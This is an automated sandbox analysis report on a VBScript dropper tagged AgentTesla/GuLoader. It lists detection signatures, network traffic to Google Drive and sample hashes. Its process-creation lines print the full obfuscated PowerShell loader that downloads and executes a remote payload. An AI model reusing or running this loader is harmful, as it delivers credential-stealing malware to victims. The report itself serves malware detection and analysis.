Windows Analysis Report
justificant de transfer#U00e8ncia.vbs

Overview

General Information

Sample name: justificant de transfer#U00e8ncia.vbs
renamed because original name is a hash value
Original sample name: justificant de transferncia.vbs
Analysis ID: 1427932
MD5: 6d2f93878e625759f49553c5f971ddc9
SHA1: bf821caba21c6786fb3c0657259fa9e6fa09aace
SHA256: b6938d3e36a7d58523cd80f095f36593e0de47fe6d65dd74e5e91c0719a3849c
Tags: AgentTeslaGuLoadervbs
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: justificant de transfer#U00e8ncia.vbs ReversingLabs: Detection: 26%
Source: justificant de transfer#U00e8ncia.vbs Virustotal: Detection: 13% Perma Link
Source: unknown HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb1 source: powershell.exe, 00000003.00000002.1477405694.00000245188C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1476770908.0000024518751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32N source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314579860.00000231779F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1315096548.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313805648.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda4611d
Source: wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000002.1325736248.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324822095.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324163948.0000023175B9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1322539019.0000023175B95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enT:
Source: wscript.exe, 00000000.00000003.1314982983.0000023177CB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314661704.0000023177C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda46
Source: powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.1437259239.0000024502053000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2wP
Source: powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w&export=download
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1437259239.0000024501543000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.7:49702 version: TLS 1.2

System Summary

barindex
Source: amsi64_7180.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6817 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3400AD 3_2_00007FFAAC3400AD
Source: justificant de transfer#U00e8ncia.vbs Initial sample: Strings found which are bigger than 50
Source: amsi64_7180.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal96.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Colouration.Afh Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_550yl205.cft.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificant de transfer#U00e8ncia.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: justificant de transfer#U00e8ncia.vbs ReversingLabs: Detection: 26%
Source: justificant de transfer#U00e8ncia.vbs Virustotal: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificant de transfer#U00e8ncia.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei 